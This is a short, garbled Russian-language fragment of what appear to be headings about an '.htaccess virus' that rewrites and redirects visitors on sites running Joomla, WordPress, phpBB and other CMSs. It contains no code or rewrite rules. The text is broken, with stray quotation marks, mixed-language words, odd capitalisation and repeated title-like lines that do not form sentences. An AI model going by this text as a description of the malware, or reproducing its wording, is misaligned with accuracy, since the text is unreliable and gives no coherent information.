Этот "вирус. Htaccess "Affect любой CMS (Joomla, WordPress, PHPBB И т.д.) с использованием .htaccess .
. Htaccess Перенаправление Вирус Hack & .
Вредоносное / Вирус - .htaccess "переписать" и перенаправление